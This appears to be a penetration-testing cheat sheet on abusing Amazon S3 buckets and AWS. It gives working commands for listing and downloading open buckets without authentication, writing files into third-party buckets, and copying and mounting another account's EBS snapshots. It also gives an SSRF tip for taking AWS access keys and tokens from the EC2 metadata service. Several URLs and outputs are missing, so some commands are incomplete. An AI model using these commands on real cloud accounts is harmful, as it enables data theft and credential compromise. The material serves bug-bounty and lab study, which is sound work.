Amazon AWS S3 Buckets

Amazon Bucket S3 AWS #

Summary #

AWS Configuration #

Prerequisites, at least you need awscli

sudo apt install awscli

You can get your credential here but you need an aws account, free tier account :

aws configure
aws configure --profile nameofprofile

then you can use –profile nameofprofile in the aws command.

Alternatively you can use environment variables instead of creating a profile.

export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ

Open Bucket #

By default the name of Amazon Bucket are like[bucket_name]/, you can browse open buckets if you know their names[bucket_name]/

Their names are also listed if the listing is enabled.

<ListBucketResult xmlns="">

Alternatively you can extract the name of inside-site s3 bucket with %C0. (Trick from

eg: http://redacted/avatar/123%C0

Basic tests #

Listing files #

aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3:// --no-sign-request --region us-west-2

You can get the region with a dig and nslookup

$ dig
;; ANSWER SECTION:    5    IN    A
$ nslookup
Non-authoritative answer: name =

Move a file into the bucket #

aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=
aws s3 mv test.txt s3://
FAIL : "move failed: ./test.txt to s3:// A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"

Download every things #

aws s3 sync s3:// . --no-sign-request --region us-west-2

Check bucket disk size #

Use --no-sign for un-authenticated check.

aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'

AWS - Extract Backup #

$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",
$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",
Create a volume using snapshot
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
In Aws Console -> EC2 -> New Ubuntu
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem
Mount the volume
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt

Bucket juicy data #

Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting : will return the AccessKeyID, SecretAccessKey, and Token

For example with a proxy :

References #